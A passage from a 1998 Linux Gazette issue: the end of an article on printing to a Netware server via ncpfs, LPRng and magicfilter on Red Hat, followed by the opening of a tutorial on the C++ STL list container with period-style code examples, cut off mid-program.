Note: The location or version numbers of these software may have changed.


Installation

You have to be root to install this.

If you havent already done so, recompile your kernel with ipx support, but not full internal net. You may also compile ipx as a module. See the Kernel- HOWTO for more information about this.

Install ncpfs with: rpm -i ncpfs-2.0.11-3.i386.rpm (Your version number may differ)
You may also need to install ipx-utils. Rpm will notify you if you haven't installed ipx-utils yet.

Execute one of the following, depending on your setup. In my case the first line worked perfectly on all of the systems I have installed this on:

You may also want to read the man pages for these commands. Since you want to print to a netware server, I assume you have access to it, and should not have a problem obtaining the correct settings here. You should also put this line in /etc/rc.d/rc.local, so that it gets executed everytime you boot your system.

You have to remove the existing lpd before installing LPRng, this is most easily acomplished with:

/etc/rc.d/init.d/lpd stop
rpm -e printtool
rpm -e rhs-printfilters
rpm -e lpr

Extract the LPRng- and magicfilter tarballs into /usr/local/src (or anywhere else you feel comfortable with), they should untar into their own subdirectories. Now follow the directions given in the README or INSTALL files of both, this usually consists of a ./configure, make, make install.

Create the directory /usr/local/printfilters and copy a suitable filter from /usr/local/src/magicfilter-1.2/filters to this directory. You may need to modify this file slightly to make it work propperly. In my case i used the psonly600-filter file: on rh5.1 a2ps was invoked with bad parameters; on rh5.0 a2ps wasn't installed and nowhere to be found on the cdrom, so i had to add this to the file:

default pipe mpage -ba4 -o -1

or install nenscript (from redhat cd) and add this line (this is probably the best option):

default pipe /usr/bin/nenscript -b -p-

Also, change these lines:

# postscript
0 %! postscript
0 \004%! postscript
to this:

# postscript
0 %! cat
0 \004%! cat

This is because "postscript" caused an extra clean page to be printed after every print job.

I also include this filter. It was orriginally used to print to a HP laserjet 4000.

Copy nwprint, filter and .config to /usr/local/printfilters, then edit filter and replace psonly1200-filter with the filter you intend to use.

Edit the .config file to contain the information relevant to your setup.

Now do:

 
        chmod 755 filter nwprint
        chmod 640 .config
        chown root.daemon .config

Install the lpd startup script in /etc/rc.d/init.d. remember to do a chmod 755 /etc/rc.d/init.d/lpd.

Now you have to make symlinks to start lpd in the correct runlevels:

cd /etc/rc.d/rc3.d
ln -s ../init.d/lpd s90lpd
cd /etc/rc.d/rc5.d
ln -s ../init.d/lpd s90lpd
cd /etc/rc.d/rc6.d
ln -s ../init.d/lpd k08lpd
cd /etc/rc.d/rc0.d
ln -s ../init.d/lpd k08lpd

This should have lpd start up in the runlevels mostly used by Redhat users.

Now we get to modifying a bunch of files in /etc...
Edit /etc/printcap to look like the following:

lp:\
:sd=/var/spool/lpd/lp:\
:mx#0:\
:sh:\
:if=/usr/local/printfilters/filter:\
:af=/var/spool/lpd/lp/acct:\
:lp=/dev/null:

Edit /etc/lpd.conf and locate the line:

# Purpose: lock the IO device
# lk@

Uncomment the "lk@". This tells lpd NOT to place an exclusive lock onto the device, so if any other program tries to use /dev/null while we're printing it will not break.

Edit /etc/lpd.perms and add these lines:

REJECT NOT SERVER
REJECT SERVICE=R,P,Q,M,C,S NOT REMOTEUSER=yourusername,another,friend

This allows only the users in the comma separated list to print from the local host. I dont know what will happen if two users print at exactly the same time, but for the most part you will only allow yourself to print anyway.

Finally execute:

checkpc -f
/etc/rc.d/init.d/lpd start

Everything should work propperly now. You should now clean up /usr/local/src. Keep the tarballs in a safe place, then do this:

rm -rf /usr/local/src/magicfilter-1.2
rm -rf /usr/local/src/LPRng-3.5.1


Why it took me a week to figure this out...

I tried to do the same thing with lpd, but for some sinister reason nprint could not access any Netware servers if it was invoked by lpd. If the filter was invoked from the commandline, only then could nprint access the server and print the job. I had a few options: Figure out a way of forcing lpd to allow me access, produce a kind of work arround, or use another spooler. Since lpd already have lots of other problems (Read about it, never seen them in action), I settled for LPRng.

At first I tried to make the standard Redhat print filter work with LPRng. This did not work very well, because the standard filter use files in /var/spool/lpd/lp while LPRng is rather fussy about the permisions of files in this directory. Moving the files broke everything, and as it was already 3:00 on a Saturday morning by then, I quickly got magicfilter off sunsite (We have a local mirror :) ), compiled the software and built myself a little filter script.

Now all I had to do was introduce some kind of password hiding mechanism so that users of the system cannot see the Netware username and password. I discovered that the filter was executed as the "daemon" user, therefore decided to create a .config file with permisions 640 and ownership root.daemon. This file is simply included into nwprint, but while anyone can read nwprint, no one can read .config ( except root and daemon of course :) ).

Well this allowed any user with access to the system to print, usually you would only want yourself to have access to the printer, so after reading through /etc/lpd.perms and part of the documentation, I came up with the two REJECT lines mentioned above.


A few useful tips

Or rather, things I discovered while doing this...

1. To test the setup, change the nwprint script to cat all input to a file in /tmp. This is also nice to produce postscript files from applications that do not have the capability to save in postscript: Just uncomment the "cat > /tmp/printout.ps" line in the nwprint script. Of course you'll have to comment the nprint line out :) You can even have this installed as a second "Printer", together with your existing printer.

2. To print from pine, you have to setup lpr as default printing command rather than the other default thingy it uses.

3. Use the Generic postscript option in StarOffice. Even if you don't have a postscript printer, you should be able to use it as long as ghostscript has a driver for your printer.

4. Look in /pub/Linux/system/printing on sunsite.unc.edu for other print filters. There's plenty of existing solutions for most of the Canon bubble jet printers, as well as HP deskjets and some of the Epson printers.

Also read the Printing-HOWTO, it should be installed in /usr/doc/HOWTO but if it is not there, locate the RPM on your Redhat 5.0/5.1 CD and install it, having the howto's arround is always nice, and is in my oppinion a MUST.


DISCLAIMER


This is the place where I tell you that I am not responsible for any harm that may come to you or your computer as a result of following the steps in this article. Blah Blah...

If I did anything stupid or there are better ways to do this please let me know at the e-mail address below, this address should be valid at least until somewhere late in 1999 :)

Izak Burger


Copyright © 1998, Izak Burger
Published in Issue 34 of Linux Gazette, November 1998


[ TABLE OF CONTENTS ] [ FRONT PAGE ]  Back  Next


"Linux Gazette...making Linux just a little more fun!"


Introduction to STL, Standard Template Library

By


This article is about a new extension to the C++ language, the Standard Template Library, otherwise known as STL.

When I first proposed the idea of an article on STL, I must say I somewhat underestimated the depth and breadth of the topic. There is a lot of ground to cover and there are a number of books describing STL in detail. So I looked at my original idea and refocussed. Why was I writing an article and what could I contribute? What would be useful? Was there a need for another STL article.

As I turned the pages of Musser and Saini I could see programming time dissolving in front of me. I could see late nights disappearing, and on target software projects reappearing. I could see maintainable code. A year has passed since then and the software I have written using STL has been remarkably easy to maintain. And shock horror, other people can maintain it as well, without me!

However, I also remembered that at the beginning it was difficult wading through the technical jargon. Once I bought Musser & Saini everything fell into place but before that it was a real struggle and the main thing I yearned for was some good examples.

Also the third edition of Stroustrup which covers STL as part of C++ was not out when I started.

So I thought it might be useful to write an article about real life use of STL for new STL programmers. I always learn faster if I can get my hands on some good examples, particularly on new subjects like this.

The other thing is, STL is supposed to be easy to use. So theoretically we should be able to start using STL straight away.

What is STL? STL stands for the Standard Template Library. Possibly one of the most boring terms in history, for one of the most exciting tools in history. STL basically consists of a bunch of containers - lists, vectors, sets, maps and more, and a bunch of algorithms and other components. This "bunch of containers and algorithms" took some of the brightest people in the world many years to create.

The purpose of STL is to standardise commonly used components so you don't have to keep reinventing them. You can just use the standard STL components off the shelf. STL is also part of C++ now, so there will be no more extra bits and pieces to collect and install. It will be built into your compiler. Because the STL list is one of the simpler containers, I thought that it might be a good place to start in demonstrating the practical use of STL. If you understand the concepts behind this one, you'll have no trouble with the rest. Besides, there is an awful lot to a simple list container, as we'll see.

In this article we will see how to define and initialise a list, count elements, find elements in a list, remove elements, and other very useful operations. In doing so we will cover two different kinds of algorithms, STL generic algorithms which work with more than one container, and list member functions which work exclusively with the list container.

Just in case anyone's wondering, here is a brief rundown on the three main kinds of STL components. The STL containers hold objects, built in objects and class objects. They keep the objects secure and define a standard interface through which we can manipulate the objects. Eggs in an egg container won't roll off the kitchen bench. They are safe. So it is with objects in STL containers. They are safe. I know that sounds corny but it's true.

STL algorithms are standard algorithms we can apply to the objects while they are in the container. The algorithms have well known execution characteristics. They can sort the objects, remove them, count them, compare them, find a particular one, merge objects into another container, and carry out many other useful operations.

STL iterators are like pointers to the objects in the containers. STL algorithms use iterators to operate on containers. Iterators set bounds for algorithms, regarding the extent of the container, and in other ways. For example some iterators only let the algorithms read elements, some allow them to write elements, some both. Iterators also determine the direction of processing in a container.

You can obtain iterators to the first position in a container by calling the container member function begin(). You can call the container end() function to get the past the end value (where to stop processing).

This is what STL is all about, containers, algorithms, and iterators to allow the algorithms to work on the elements in the containers. The algorithms manipulate the objects in a measurable, standard way, and are made aware of the precise extent of the container via iterators. Once this is done they won't ever "run off the edge". There are other components which enhance the functionality of these core component types, such as function objects. We will also look at some examples of these. For now, lets take a look at the STL list.


Defining a List

We can define an STL list like this.

 
#include <string>
#include <list>
int main (void) {
  list<string> Milkshakes;
}
Thats to Linux Journal, it. You've defined a list. Could it have been any easier? By saying list<string> Milkshakes you've instantiated a template class list<string>, and then instantiated an object of that type. But lets not fuss with that. At this stage you really only need to know that you have defined a list of strings. You need the header file list to provide the STL list class. I compiled these test programs using GCC 2.7.2 on my Linux box. For example:
 
g++ test1.cpp -otest1
Note that the include file iostream.h is buried in one of the STL header files. Thats why it is missing in some of the examples.

Now that we have a list, we can start using it to hold things. We'll add some strings to the list. There is an important thing called the value type of the list. The value type is the type of the object the list holds. In this case the value type of the list is string, as the list holds strings.


Inserting elements into a list with the list member functions push_back and push_front

 
#include <string>
#include <list>
#
int main (void) {
  list<string> Milkshakes;
  Milkshakes.push_back("Chocolate");
  Milkshakes.push_back("Strawberry");
  Milkshakes.push_front("Lime");
  Milkshakes.push_front("Vanilla");
}
We now have a list with four strings in it. The list member function push_back() places an object onto the back of the list. The list member function push_front() puts one on the front. I often push_back() some error messages onto a list, and then push_front() a title on the list so it prints before the error messages.


The list member function empty()

It is important to know if a list is empty. The empty() list member function returns true if the list is empty. Empty is a deceptively simple concept. I often use it in the following way. Throughout a program I use push_back() to put error messages onto a list. Then by calling empty() I can tell if the program has reported any errors. If I define one list for informational messages, one for warnings, and one for serious errors, I can easily tell what types of errors have occurred just by using empty().

I can populate these lists throughout the program, then smarten them up with a title, or maybe sort them into categories, before printing them out.

Here's what I mean.

 
/*
|| Using a list to track and report program messages and status 
*/
#include <iostream.h>
#include <string>
#include <list>
#
int main (void) {
  #define OK 0 
  #define INFO 1
  #define WARNING 2
#
  int return_code;
#
  list<string> InfoMessages;
  list<:string> WarningMessages;
#
  // during a program these messages are loaded at various points
  InfoMessages.push_back("Info: Program started");
  // do work...
  WarningMessages.push_back("Warning: No Customer records have been found");
  // do work...
 #
  return_code = OK; 
 #
  if  (!InfoMessages.empty()) {          // there were info messages
     InfoMessages.push_front("Informational Messages:");
     // ... print the info messages list, we'll see how later
     return_code = INFO;
  }
#
  if  (!WarningMessages.empty()) {       // there were warning messages
     WarningMessages.push_front("Warning Messages:");
     // ... print the warning messages list, we'll see how later
     return_code = WARNING;              
  }
#
  // If there were no messages say so.
  if (InfoMessages.empty() && WarningMessages.empty()) {
     cout << "There were no messages " << endl;
  }
#
  return return_code;
}


Processing elements in a list with a for loop

We will want to be able to iterate through any list, to, for example, print all the objects in the list to see the effect of various operations on a list. To iterate through a list, element by element we can proceed as follows

 
/*
|| How to print the contents of a simple STL list. Whew! 
*/
#include <iostream.h>
#include <string>
#include <list>
#
int main (void) {
list<string> Milkshakes;
list<string>::iterator MilkshakeIterator;
#
  Milkshakes.push_back("Chocolate");
  Milkshakes.push_back("Strawberry");
  Milkshakes.push_front("Lime");
  Milkshakes.push_front("Vanilla");
 # 
  // print the milkshakes
  Milkshakes.push_front("The Milkshake Menu");
  Milkshakes.push_back("*** Thats the end ***");
  for (MilkshakeIterator=Milkshakes.begin(); 
         MilkshakeIterator!=Milkshakes.end(); 
          ++MilkshakeIterator) {
    // dereference the iterator to get the element
    cout << *MilkshakeIterator << endl;
  }     
}
In this program we define an iterator, MilkshakeIterator. We set MilkshakeIterator to the first element of the list. To do this we call Milkshakes.begin() which returns an iterator to the beginning of the list. We then compare MilkshakeIterator to the end of list value Milkshakes.end(), and stop when we get there.

The end() function of a container returns an iterator to the position one past the end of the container. When we get there, we stop processing. We cannot dereference the iterator returned by a container's end() function. We just know it means we have passed the end of the container and should stop processing elements. This holds for all STL containers.

In the above example at each pass through the for loop we dereference the iterator to obtain the string, which we print.

In STL programming we use one or more iterators in every algorithm. We use them to access objects in a container. To access a given object we point the iterator at the required object, then we dereference the iterator.

The list container, in case you're wondering, does not support adding a number to a list iterator to jump to another object in the container. That is, we cannot say Milkshakes.begin()+2 to point to the third object in the list, because the STL list is implemented as a double linked list, which does not support random access. The vector and deque containers, other STL containers, do provide random access.

The above program printed the contents of the list. Anyone reading it can immediately see how it works. It uses standard iterators and a standard list container. There is not much programmer dependent stuff in it, or a home grown list implementation. Just standard C++. That's an important step forward. Even this simple use of STL makes our software more standard.


Processing elements in a list with the STL generic algorithm for_each

Even with an STL list and iterator we are still initialising, testing, and incrementing the iterator to iterate through a container. The STL generic for_each algorithm can relieve us of that work.

 
/*
|| How to print a simple STL list MkII
*/
#include <iostream.h>
#include <string>
#include <list>
#include <algorithm>
#
PrintIt (string& StringToPrint) {
  cout << StringToPrint << endl;
}
#
int main (void) {
  list<string> FruitAndVegetables;
  FruitAndVegetables.push_back("carrot");
  FruitAndVegetables.push_back("pumpkin");
  FruitAndVegetables.push_back("potato");
  FruitAndVegetables.push_front("apple");
  FruitAndVegetables.push_front("pineapple");
 #
  for_each  (FruitAndVegetables.begin(), FruitAndVegetables.end(), PrintIt);
}
In this program we use the STL generic algorithm for_each() to iterate though an iterator range and invoke the function PrintIt() on each object. We don't need to initialise, test or increment any iterators. for_each() nicely modularises our code. The operation we are performing on the object is nicely packaged away in a function, we have gotten rid of the loop, and our code is clearer.

The for_each algorithm introduces the concept of an iterator range, specified by a start iterator and an end iterator. The start iterator specifies where to start processing and the end iterator signifies where to stop processing, but is not included in the range.


Counting elements in a list with the STL generic algorithm count()

The STL generic algorithms count() and count_if() count occurrences of objects in a container. Like for_each(), the count() and count_if() algorithms take an iterator range.

Lets count the number of best possible scores in a list of student's exam scores, a list of ints.

 
/*
|| How to count objects in an STL list
*/
#include <list>
#include <algorithm>
#
int main (void) {
  list<int> Scores;
#
  Scores.push_back(100); Scores.push_back(80);
  Scores.push_back(45); Scores.push_back(75);
  Scores.push_back(99); Scores.push_back(100);
#
  int NumberOf100Scores(0);     
  count (Scores.begin(), Scores.end(), 100, NumberOf100Scores);
#
  cout << "There were " << NumberOf100Scores << " scores of 100" << endl;
}
The count() algorithm counts the number of objects equal to a certain value. In the above example it checks each integer object in a list against 100. It increments the variable NumberOf100Scores each time a container object equals 100. The output of the program is
 
  There were 2 scores of 100


Counting elements in a list with the STL generic algorithm count_if()

count_if() is a much more interesting version of count(). It introduces a new STL component, the function object. count_if() takes a function object as a parameter. A function object is a class with at least operator () defined. Some STL algorithms accept function objects as parameters and invoke operator () of the function object for each container object being processed.

Function objects intended for use with STL algorithms have their function call operator returning true or false. They are called predicate function objects for this reason. An example will make this clear. count_if() uses the passed in function object to make a more complex assessment than count() of whether an object should be counted. In this example we will count toothbrushes sold. We will refer to sales records containing a four character product code and a description of the product.

 
/*
|| Using a function object to help count things
*/
#include <string>
#include <list>
#include <algorithm>
#
const string ToothbrushCode("0003");
#
class IsAToothbrush {
public:  
bool operator() ( string& SalesRecord ) {
    return SalesRecord.substr(0,4)==ToothbrushCode;
  }     
};
#
int main (void) {
  list<string> SalesRecords;
#
  SalesRecords.push_back("0001 Soap");
  SalesRecords.push_back("0002 Shampoo");
  SalesRecords.push_back("0003 Toothbrush");
  SalesRecords.push_back("0004 Toothpaste");
  SalesRecords.push_back("0003 Toothbrush");
 # 
  int NumberOfToothbrushes(0);  
  count_if (SalesRecords.begin(), SalesRecords.end(), 
             IsAToothbrush(), NumberOfToothbrushes);
#
  cout << "There were " 
       << NumberOfToothbrushes 
       << " toothbrushes sold" << endl;
}
The output of the program is
 
There were 2 toothbrushes sold
The program works as follows: A function object class is defined, IsAToothbrush. Objects of this class can determine whether a sales record is a toothbrush sales record or not. Their function call operator () will return true if a record is a toothbrush sales record and false otherwise.

The count_if() algorithm will process container objects in the range specified by the first and second iterator parameters. It will increment NumberOfToothbrushes for each object in the container for which IsAToothbrush()() returns true.

The net result is that NumberOfToothbrushes will contain the number of sales records where the product code was "0003", that is, where the product was a toothbrush.

Note that the third parameter to count_if(), IsAToothbrush(), is a temporary object constructed with it's default constructor. The () do not signify a function call. You are passing a temporary object of class IsAToothbrush to count_if(). count_if() will internally invoke IsAToothbrush()() for each object in the container.


A more complex function object with the STL generic algorithm count_if()

We can further develop the idea of the function object. Assume we need to pass more information to a function object. We cannot do this using the function call operator, because that must be defined to take only an object of the value type of the list. However by specifying a non-default constructor for IsAToothbrush we can initialise it with whatever information we need. We might need to have a variable code for a toothbrush for example. We can add this extra information into the function object as follows:

 
/*
|| Using a more complex function object
*/
#include <iostream.h>
#include <string>
#include <list>
#include <algorithm>
#
class IsAToothbrush {
public:
  IsAToothbrush(string& InToothbrushCode) : 
      ToothbrushCode(InToothbrushCode) {}
  bool operator() (string& SalesRecord) {
    return SalesRecord.substr(0,4)==ToothbrushCode;
}       
private:
  string ToothbrushCode;        
};
#
int main (void) {
  list<string> SalesRecords;
#
  SalesRecords.push_back("0001 Soap");
  SalesRecords.push_back("0002 Shampoo");
  SalesRecords.push_back("0003 Toothbrush");
  SalesRecords.push_back("0004 Toothpaste");
  SalesRecords.push_back("0003 Toothbrush");
 # 
  string VariableToothbrushCode("0003");
#
  int NumberOfToothbrushes(0);  
  count_if (SalesRecords.begin(), SalesRecords.end(), 
              IsAToothbrush(VariableToothbrushCode),
                 NumberOfToothbrushes);
  cout << "There were  "
       << NumberOfToothbrushes 
       << " toothbrushes matching code "
       << VariableToothbrushCode
       << " sold" 
       << endl;
}
The output of the program is
 
There were  2 toothbrushes matching code 0003 sold
This example shows how to pass information to the function object. You can define any constructors that you like and you can do any processing in the function object that you like, well, that the compiler will tolerate anyhow.

You can see that function objects really extend the basic counting algorithm.

At this stage we have covered

These examples were chosen to show commonly needed list operations. If you understand these basic principles you will have no trouble using STL productively. Mind you it does take some practice. We'll now extend our knowledge with some more complicated operations, both list member functions and STL generic algorithms.


Finding objects in a list using the STL generic algorithm find()

How do we find something in a list? The STL generic algorithms find() and find_if() will do that. Like for_each(), count(), and count_if(), these algorithms take an iterator range, specifying what part of a list or any other container for that matter, to process. As usual the first iterator specifies where to start processing, the second iterator specifies where to stop processing. The position specified by the second iterator is not included in processing.

Here's how find() works.

 
/*
|| How to find things in an STL list
*/
#include <string>
#include <list>
#include <algorithm>
#
int main (void) {
  list<string> Fruit;
  list<string>::iterator FruitIterator;
#
  Fruit.push_back("Apple");
  Fruit.push_back("Pineapple");
  Fruit.push_back("Star Apple");
#
  FruitIterator = find (Fruit.begin(), Fruit.end(), "Pineapple");
#
  if (FruitIterator == Fruit.end()) {  
    cout << "Fruit not found in list" << endl; 
  }
  else {
   cout << *FruitIterator << endl;
  }
}
The output of the program will be
 
Pineapple
If find does not find the specified object, it returns the past the end iterator Fruit.end(). Otherwise it returns an iterator to the found list object.


Finding objects in a list using the STL generic algorithm find_if()

There is another more powerful version of find(). This example demonstrates find_if(), which accepts a function object as a parameter, and uses it to make a more complex assessment of whether an object is "found".

Say we have records containing events and dates stored in chronological order in a list. We wish to find the first event that took place in 1997.

 
/*
|| How to find things in an STL list MkII 
*/
#include <string>
#include <list>
#include <algorithm>
#
class EventIsIn1997 {
public:
 bool operator () (string& EventRecord) {
   // year field is at position 12 for 4 characters in EventRecord      
   return EventRecord.substr(12,4)=="1997";
  }  
};
#
int main (void) {
  list<string> Events;
#
// string positions 0123456789012345678901234567890123456789012345      
  Events.push_back("07 January  1995  Draft plan of house prepared");
  Events.push_back("07 February 1996  Detailed plan of house prepared");
  Events.push_back("10 January  1997  Client agrees to job");
  Events.push_back("15 January  1997  Builder starts work on bedroom");
  Events.push_back("30 April    1997  Builder finishes work");
 # 
  list<string>::iterator EventIterator = 
      find_if (Events.begin(), Events.end(), EventIsIn1997());
#
  // find_if completes the first time EventIsIn1997()() returns true 
  // for any object. It returns an iterator to that object which we 
  // can dereference to get the object, or if EventIsIn1997()() never
  // returned true, find_if returns end()
  if (EventIterator==Events.end()) {  
    cout << "Event not found in list" << endl; 
  }
  else {
   cout << *EventIterator << endl;
  }
}
The output of the program will be
 
10 January  1997  Client agrees to job


Finding sequences in a list using the STL generic algorithm search

Some characters are a little easier to deal with in an STL container. Lets look at a sequence of characters that can be difficult to work with. We'll define an STL list to hold the characters.

 
  list<char> Characters;
We now have a rock solid sequence of characters that knows how to manage it's own memory without any help. It knows precisely where it starts and ends. That's a useful thing. I don't know if I'd say that about a null terminated array of characters.

Lets add some of our favourite characters to the list.

 
  Characters.push_back('\0');
  Characters.push_back('\0');
  Characters.push_back('1');
  Characters.push_back('2');
How many null characters have we got?
 
  int NumberOfNullCharacters(0);
  count(Characters.begin(), Characters.end(), '\0', NumberOfNullCharacters);
  cout << "We have " << NumberOfNullCharacters << endl;
Let's find the character '1'
 
  list<char>::iterator Iter;
  Iter = find(Characters.begin(), Characters.end(), '1');
  cout << "We found " << *Iter << endl;
This example is intended to show that STL containers allow you to handle null characters in a more standard way. Now lets search a container for two nulls with the STL search algorithm.

The STL generic algorithm search() searches a container, as you may have guessed, but for a sequence of elements, unlike find() and find_if() which search for a single element.

 
/*
|| How to use the search algorithm in an STL list
*/
#include <string>
#include <list>
#include <algorithm>
#
int main ( void ) { 
#
  list<char> TargetCharacters;
  list<char> ListOfCharacters;
#
  TargetCharacters.push_back('\0');
  TargetCharacters.push_back('\0');
#
  ListOfCharacters.push_back('1');
  ListOfCharacters.push_back('2');
  ListOfCharacters.push_back('\0');
  ListOfCharacters.push_back('\0');
#
  list<char>::iterator PositionOfNulls = 
    search(ListOfCharacters.begin(), ListOfCharacters.end(), 
            TargetCharacters.begin(), TargetCharacters.end());
#
  if (PositionOfNulls!=ListOfCharacters.end())
    cout << "We found the nulls" << endl;
}
The output of the program will be
 
We found the nulls
The search algorithm finds the first occurrence of one sequence in another sequence. In this case we search for the first occurrence of TargetCharacters which is a list containing two null characters, in ListOfCharacters.

The parameters for search are two iterators specifying a range to search, and two more iterators specifying a range to search for. So we are looking for the entire range of the TargetCharacters list, in the entire range of ListOfCharacters.

If TargetCharacters is found, search will return an iterator to the first character in ListOfCharacters where the sequences matched. If a match is not found, search will return the past the end value ListOfCharacters.end().


Sorting a list using the list member function sort()

To sort a list we use the list member function sort(), not the generic algorithm sort(). All the algorithms we have been using up till now have been generic algorithms. However in STL, sometimes a container will supply it's own implementation of a particular algorithm, either through necessity or for enhanced performance.

In this case the list container has it's own sort because the generic sort algorithm only sorts containers which provide random access to the elements inside. The list container does not provide random access to the elements in the list, because it is implemented as a linked list. A special sort() member function is needed which can sort a linked list.

You'll find this with STL. For various reasons the containers will supply extra functions, where necessary for efficiency or where special performance gains can be made by taking advantage of some special feature of a container's structure.

 
/*
|| How to sort an STL list
*/
#include <string>
#include <list>
#include <algorithm>
#
PrintIt (string& StringToPrint) { cout << StringToPrint << endl;}
#
int main (void) {
  list<string> Staff;
  list<string>::iterator PeopleIterator;
#
  Staff.push_back("John");
  Staff.push_back("Bill");
  Staff.push_back("Tony");
  Staff.push_back("Fidel");
  Staff.push_back("Nelson"); 
#
  cout << "The unsorted list " << endl;
  for_each(Staff.begin(), Staff.end(), PrintIt );
#
  Staff.sort();
#
  cout << "The sorted list " << endl;
  for_each(Staff.begin(), Staff.end(), PrintIt); 
}
The output is
 
The unsorted list 
John
Bill
Tony
Fidel
Nelson
The sorted list 
Bill
Fidel
John
Nelson
Tony


Inserting elements in a list with the insert() list member function

The list member functions push_front() and push_back() add elements to the front and back of a list respectively. You can also add an object at any point in a list with insert().

insert() can add one object, a number of copies of an object, or a range of objects. Here are some examples of inserting objects into a list.

 
/*
|| Using insert to insert elements into a list.
*/
#include <list>
#
int main (void) {
  list<int> list1;
#
  /*
  || Put integers 0 to 9 in the list
  */
  for (int i = 0; i < 10; ++i)  list1.push_back(i);   
#
  /*
  || Insert -1 using the insert member function
  || Our list will contain -1,0,1,2,3,4,5,6,7,8,9
  */
  list1.insert(list1.begin(), -1); 
#
  /*
  || Insert an element at the end using insert
  || Our list will contain -1,0,1,2,3,4,5,6,7,8,9,10
  */
  list1.insert(list1.end(), 10);
 # 
  /*
  || Inserting a range from another container
  || Our list will contain -1,0,1,2,3,4,5,6,7,8,9,10,11,12
  */
  int IntArray[2] = {11,12};
  list1.insert(list1.end(), &IntArray[0], &IntArray[2]);
#
  /*
  || As an exercise put the code in here to print the lists!
  || Hint: use PrintIt and accept an interger
  */
}
Note that the insert() function adds one or more elements at the position of the iterator you specify. Your elements will appear in the list before the element that was at the specified iterator position.


List constructors

We have been defining a list like this.

 
  list<int> Fred; 
You can also define a list and initialise it's elements like this
 
  // define a list of 10 elements and initialise them all to 0
  list<int> Fred(10, 0);
  // list now contains 0,0,0,0,0,0,0,0,0,0
Or you can define a list and initialise it with a range from another STL container, which doesn't have to be a list, just a container with the same value type.
 
  vector<int> Harry;
  Harry.push_back(1); 
  Harry.push_back(2); 
#
  // define a list and initialise it with the elements in Harry
  list<int> Bill(Harry.begin(), Harry.end());
  // Bill now contains 1,2


Erasing elements from a list using list member functions

The list member function pop_front() removes the first element from a list. pop_back() removes the last element. The member function erase() erases the element pointed to by an iterator. There is another erase() function which can erase a range of elements.

 
/*
|| Erasing objects from a list
*/
#include <list>
#
int main (void) {
  list<int> list1;   // define a list of integers
#
  /*
  || Put some numbers in the list
  || It now contains 0,1,2,3,4,5,6,7,8,9
  */
  for (int i = 0; i < 10; ++i)  list1.push_back(i);
#
  list1.pop_front();    // erase the first element 0
#
  list1.pop_back();     // erase the last element 9
 # 
  list1.erase(list1.begin());  // erase the first element (1) using an iterator
#
  list1.erase(list1.begin(), list1.end());  // erase all the remaining elements
#
  cout << "list contains " << list1.size() << " elements" << endl;
}
The output will be
 
list contains 0 elements


Removing elements from a list using the list member function remove()

The list member function remove() erases objects from a list.

 
/*
|| Using the list member function remove to remove elements
*/
#include <string>
#include <list>
#include <algorithm>
#
PrintIt (const string& StringToPrint) {
  cout << StringToPrint << endl;
}
#
int main (void) {
  list<string> Birds;
#
  Birds.push_back("cockatoo");
  Birds.push_back("galah");
  Birds.push_back("cockatoo");
  Birds.push_back("rosella");
  Birds.push_back("corella");
#
  cout << "Original list with cockatoos" << endl;
  for_each(Birds.begin(), Birds.end(), PrintIt); 
 # 
  Birds.remove("cockatoo"); 
#
  cout << "Now no cockatoos" << endl;
  for_each(Birds.begin(), Birds.end(), PrintIt); 
  
}
The output will be
 
Original list with cockatoos
cockatoo
galah
cockatoo
rosella
corella
Now no cockatoos
galah
rosella
corella


Removing elements from a list with the STL generic algorithm remove()

The generic algorithm remove() works in a different way to the list member function remove(). The generic version does not change the size of the container.

 
/*
|| Using the generic remove algorithm to remove list elements
*/
#include <string>
#include <list>
#include <algorithm>
#
PrintIt(string& AString) { cout << AString << endl; }
#
int main (void) {
  list<string> Birds;
  list<string>::iterator NewEnd;
#
  Birds.push_back("cockatoo");
  Birds.push_back("galah");
  Birds.push_back("cockatoo");
  Birds.push_back("rosella");
  Birds.push_back("king parrot");
#
  cout << "Original list" << endl; 
  for_each(Birds.begin(), Birds.end(), PrintIt);
#
  NewEnd = remove(Birds.begin(), Birds.end(), "cockatoo"); 
#
  cout << endl << "List according to new past the end iterator" << endl; 
  for_each(Birds.begin(), NewEnd, PrintIt);
#
  cout << endl << "Original list now. Care required!" << endl; 
  for_each(Birds.begin(), Birds.end(), PrintIt);
}
The output will be
Original list
cockatoo
galah
cockatoo
rosella
king parrot

List according to new past the end iterator galah rosella king parrot
Original list now. Care required! galah rosella king parrot rosella king parrot
The generic remove() algorithm returns an iterator specifying a new end to the list. The range from the beginning to the new end (not including the new end) contains the elements left after the remove. You can then erase the range from the new end to the old end using the list member function erase.


Partitioning a list with the STL generic algorithm stable_partition() and using the list member function splice()

We will finish off with a slightly more complicated example. It demonstrates the STL generic stable_partition() algorithm and one variation of the list member function splice(). Notice the use of function objects, and the absence of loops. Control passes through a series of simple statements, which are calls to STL algorithms.

stable_partition() is an interesting function. It rearranges elements so that those which satify a certain condition come before those which do not. It preserves the relative order of the two groups of elements. An example will make this clear.

Splice splices the elements of another list into the list. It removes the elements from the source list.

In this example we want to accept some flags and four filenames from the command line. The filenames must appear in order. By using stable_partition() we can accept the flags at any position relative to the filenames and get them together without disturbing the order of the filename parameters.

Due to the readily available counting and finding algorithms we can call these algorithms as necessary to determine which flag was set rather than setting other flags in our program. I find containers are very convenient for managing small amounts of variable dynamic data like this.

 
/*
|| Using the STL stable_partition algorithm
|| Takes any number of flags on the command line and 
|| four filenames in order.
*/
#include <string>
#include <list>
#include <algorithm>
#
PrintIt ( string& AString ) { cout << AString << endl; }
#
class IsAFlag {
public: 
  bool operator () (string& PossibleFlag) {
    return PossibleFlag.substr(0,1)=="-";
  }
};
#
class IsAFileName {
public:  
  bool operator () (string& StringToCheck) {
    return !IsAFlag()(StringToCheck);
  }
};
#
class IsHelpFlag {
public:  
  bool operator () (string& PossibleHelpFlag) {
    return PossibleHelpFlag=="-h";
  }
};
#
int main (int argc, char *argv[]) {
#
list<string> CmdLineParameters;       // the command line parameters
list<string>::iterator StartOfFiles;  // start of filenames 
list<string> Flags;                   // list of flags
list<string> FileNames;               // list of filenames
#
for (int i = 0; i < argc; ++i) CmdLineParameters.push_back(argv[i]);
#
CmdLineParameters.pop_front(); // we don't want the program name
#
// make sure we have the four mandatory file names
int NumberOfFiles(0);
count_if(CmdLineParameters.begin(), CmdLineParameters.end(), 
       IsAFileName(), NumberOfFiles);
#
cout << "The " 
     << (NumberOfFiles == 4 ? "correct " : "wrong ")
     << "number (" 
     << NumberOfFiles 
     << ") of file names were specified" << endl;
 #   
// move any flags to the beginning
StartOfFiles = 
  stable_partition(CmdLineParameters.begin(), CmdLineParameters.end(), 
         IsAFlag()); 
